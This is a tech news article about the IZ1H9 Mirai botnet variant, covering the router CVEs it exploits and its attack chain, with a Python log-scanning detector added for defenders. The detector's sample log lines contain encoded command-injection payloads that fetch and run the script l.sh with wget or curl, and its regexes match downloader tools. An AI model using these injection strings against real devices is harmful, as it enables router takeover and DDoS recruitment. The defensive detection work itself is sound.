Mirai DDoS Malware Variant Expands, Targets with 13 Router Exploits
A recent cybersecurity report has unveiled the resurgence of a Mirai-based DDoS (distributed denial of service) botnet known as IZ1H9. The botnet has taken an alarming turn by incorporating new tactics, techniques, and targets.
These targets include Linux-based routers from well-known brands such as D-Link, Zyxel, TP-Link, TOTOLINK, and others. IZ1H9's expansion shows it evolving into a more versatile and potent threat, and a significant challenge for defenders.
Peak in Exploitation Rates
Fortinet researchers identified a sharp spike in exploitation attempts associated with IZ1H9 during the first week of September. Thousands of attempts were recorded during this period as the malware sought to compromise vulnerable devices.
The reach of a DDoS botnet is directly linked to the diversity of devices and vulnerabilities it can exploit. IZ1H9's primary objective is to recruit compromised devices into its DDoS swarm, which it then uses to launch large-scale attacks on specific targets.
IZ1H9 employs a variety of exploits against numerous devices, for vulnerabilities dating back as far as 2015. Among the vulnerabilities it leverages are:
- D-Link devices: CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382
- Netis WF2419: CVE-2019-19356
- Sunhillo SureLine (versions before 8.7.0.1.1): CVE-2021-36380
- Geutebruck products: Multiple CVEs
- Yealink Device Management (DM) 3.6.0.20: Multiple CVEs
- Zyxel EMG3525/VMG1312 (before V5.50): CVE not specified
- TP-Link Archer AX21 (AX1800): CVE-2023-1389
- Korenix JetWave wireless AP: CVE-2023-23295
- TOTOLINK routers: Multiple CVEs
- Unspecified device: CVE not specified; the exploit targets the "/cgi-bin/login.cgi" route
This extensive targeting of devices and vulnerabilities enhances the botnet's potential to assemble a vast network capable of delivering devastating blows to targeted websites and services.
The Attack Chain and IZ1H9's Modus Operandi
IZ1H9 follows a systematic sequence of actions to compromise devices and integrate them into its network. It first exploits a publicly known vulnerability (tracked as a CVE) to gain unauthorized access to the targeted device.
Once inside, the botnet injects a payload into the compromised device. The payload contains a command that prompts the device to download a shell script named "l.sh" from a specific URL. The script then executes, deleting log files to hide its activity so that the malware can operate covertly.
Next, the compromised device fetches bot clients built for various system architectures. The script also modifies the device's iptables rules to block incoming connections on specific ports, making it harder to remove the malware.
The compromised device then contacts a command-and-control (C2) server and awaits instructions. When directed by the C2 server, the bot can launch several kinds of DDoS attack, including UDP, UDP Plain, HTTP Flood, and TCP SYN.
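The injection stage described above (a command that makes the device fetch and run a script such as "l.sh") leaves a recognisable trace in a device's or an upstream proxy's HTTP access log. The detector below is an added example written for this article, not Fortinet's code or part of the original report. The log lines, the request path "/cgi-bin/example.cgi" and the IP addresses are constructed for illustration; the detector keys on the injected download-and-execute command (downloader, command separator, execution) rather than on any specific CVE's request path, and it decodes URL-encoded and double-encoded payloads before matching.

```python
"""Flag Mirai-style "download and run a script" command injection in HTTP access logs.

Added example for this article; not Fortinet's code and not from the original
report. Log lines, the path /cgi-bin/example.cgi and all IP addresses are
constructed (TEST-NET ranges). Only the script name l.sh comes from the article.
"""
import re
from urllib.parse import unquote

# Combined-log-format line: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Pieces of the injected command: a downloader, a way to run the result, and a
# shell separator joining the payload to the original parameter value.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
EXEC_RE = re.compile(
    r"(?:(?<![\w.])(?:/bin/)?(?:sh|bash|ash)\s+\S"  # "sh /tmp/l.sh" but not "l.sh"
    r"|chmod\s+\+?x"                                 # "chmod +x ..."
    r"|\|\s*(?:sh|bash)\b)",                          # "curl ... | sh"
    re.IGNORECASE,
)
CMD_SEP_RE = re.compile(r"(;|\|\||&&|\$\(|`)")
URL_RE = re.compile(r"https?://([\w.\-:]+)(/[^\s;&|'\"]*)?", re.IGNORECASE)

SAMPLE_LOG = [
    # constructed: URL-encoded injection that fetches, chmods and runs l.sh
    '203.0.113.5 - - [03/Sep/2023:10:12:01 +0000] "GET /cgi-bin/example.cgi?cmd=%3Bwget%20http%3A%2F%2F198.51.100.7%2Fl.sh%20-O%20%2Ftmp%2Fl.sh%3Bchmod%20%2Bx%20%2Ftmp%2Fl.sh%3Bsh%20%2Ftmp%2Fl.sh HTTP/1.1" 200 512',
    # constructed: same idea, double-encoded, curl piped straight into sh
    '203.0.113.9 - - [03/Sep/2023:10:12:44 +0000] "GET /cgi-bin/example.cgi?cmd=%253Bcurl%2520-s%2520http%253A%252F%252F198.51.100.7%252Fl.sh%257Csh HTTP/1.1" 200 512',
    # constructed: benign request that merely mentions wget in a search string
    '198.51.100.23 - - [03/Sep/2023:10:13:10 +0000] "GET /search?q=wget+vs+curl HTTP/1.1" 200 2048',
    # constructed: ordinary admin page load
    '192.0.2.10 - - [03/Sep/2023:10:14:00 +0000] "GET /login.cgi HTTP/1.1" 200 1024',
]


def decode_target(target):
    """URL-decode until stable (bounded), so double-encoded payloads are seen in the clear."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line):
    """Return a dict describing a suspicious request, or None for a benign/unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    if not (DOWNLOADER_RE.search(target) and EXEC_RE.search(target)):
        return None
    # A separator is required so a query that only mentions "wget" is not flagged.
    if not CMD_SEP_RE.search(target):
        return None
    url = URL_RE.search(target)
    path = (url.group(2) or "") if url else ""
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "path": target.split("?", 1)[0],
        "dl_host": url.group(1) if url else None,
        "script": path.rsplit("/", 1)[-1] if path else None,
    }


def scan(lines):
    """Run classify() over every line and keep the hits."""
    return [hit for hit in (classify(l) for l in lines) if hit]


def summarize(hits):
    """Turn hits into indicators: stager hosts, script names, attempts per source."""
    sources = {}
    for h in hits:
        sources[h["src"]] = sources.get(h["src"], 0) + 1
    return {
        "download_hosts": sorted({h["dl_host"] for h in hits if h["dl_host"]}),
        "scripts": sorted({h["script"] for h in hits if h["script"]}),
        "sources": sources,
    }


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['src']} -> {h['path']} fetches {h['script']} from {h['dl_host']}")
    print(summarize(hits))
```

Point the script at a router's web-server log or a reverse proxy's access log; the hosts and script names it extracts are the indicators to block at the perimeter and to hunt for on other devices. Note that the detector deliberately ignores which CGI endpoint was hit, since the same stager command is reused across all of the exploits in the list above.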
Furthermore, IZ1H9 carries hardcoded credentials that it uses for brute-force attacks. This helps it spread to adjacent devices and authenticate to IoT devices for which it lacks a working exploit.
To protect against this evolving threat, owners of IoT devices are advised to strengthen their security by setting strong, unique administrator credentials.
They should also keep their devices on the latest firmware, which often includes essential security patches, and minimize their devices' exposure to the public internet to reduce the risk of exploitation.
The post Mirai DDoS Malware Variant Expands, Targets with 13 Router Exploits appeared first on The Tech Report.